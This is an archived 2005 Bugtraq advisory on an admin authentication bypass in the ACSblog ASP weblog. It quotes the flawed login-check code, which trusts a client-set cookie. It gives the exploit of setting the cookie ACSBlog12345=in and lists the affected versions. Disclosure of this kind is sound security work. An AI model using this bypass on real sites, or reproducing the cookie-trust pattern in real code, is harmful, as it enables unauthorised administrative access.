[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: ACSblog bug
From: farhad koosha <farhadkey () yahoo ! com>
Date: 2005-04-23 17:10:21
Message-ID: 20050423171021.17464.qmail () www ! securityfocus ! com
[Download RAW message or body]
*/ WWW.BAHADORLOVER.COM \*
ACSblog :
A asp weblog with manageable code blocks and logical structure make it easy for the \
novice to get into the code and customize it to your site. Full-featured enough for \
expert bloggers
vendor:www.asppress.com
Where is the bug ?
inc_login_check.asp
<% if request.cookies(cookiename)="in" then
ihaveadminright=true
else
ihaveadminright=false
end if
%>
---------------
Default cookiename is "ACSBlog12345" and you can create a cookie or using http \
headers -> ACSBlog12345=in
---------------
vulnerable versions:
0.8
1.0
1.0.1
1.0.2
1.0.3
1.1
1.1.2
1.1.3
Commercial Version
3NITRO : www.bahadorlover.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic